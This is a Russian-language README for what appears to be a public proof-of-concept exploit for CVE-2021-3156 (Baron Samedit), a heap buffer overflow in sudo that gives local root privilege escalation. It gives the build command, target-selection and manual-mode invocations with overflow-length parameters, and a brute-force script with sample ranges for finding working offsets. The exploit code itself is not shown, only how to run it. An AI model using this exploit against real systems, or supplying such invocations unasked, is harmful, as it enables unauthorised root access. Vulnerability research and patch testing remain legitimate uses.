
Эксплойт proof-of-concept для CVE-2021-3156, переполнения буфера в куче в sudo (Baron Samedit). Обеспечивает выбор цели, ручную настройку параметров и экспериментальное обнаружение методом грубой силы для повышения привилегий.
Это эксплойт для уязвимости CVE-2021-3156 в sudo (названной Baron Samedit от Qualys).
сборка:
$ make
список целей:
$ ./sudo-hax-me-a-sandwich
запуск:
$ ./sudo-hax-me-a-sandwich <target_number>
ручной режим:
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Убедитесь, что у вас установлен GNU parallel.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
некоторые шаблоны для проб:
$ ./brute.sh 90 120 50 70 150 300
Будет задействованы все доступные ядра. Не пытайтесь смотреть Netflix и брутить одновременно.
Внесите свой вклад в репозиторий Отправьте PR (разумный), я могу слить. Поставьте звездочку
Некоторые идеи: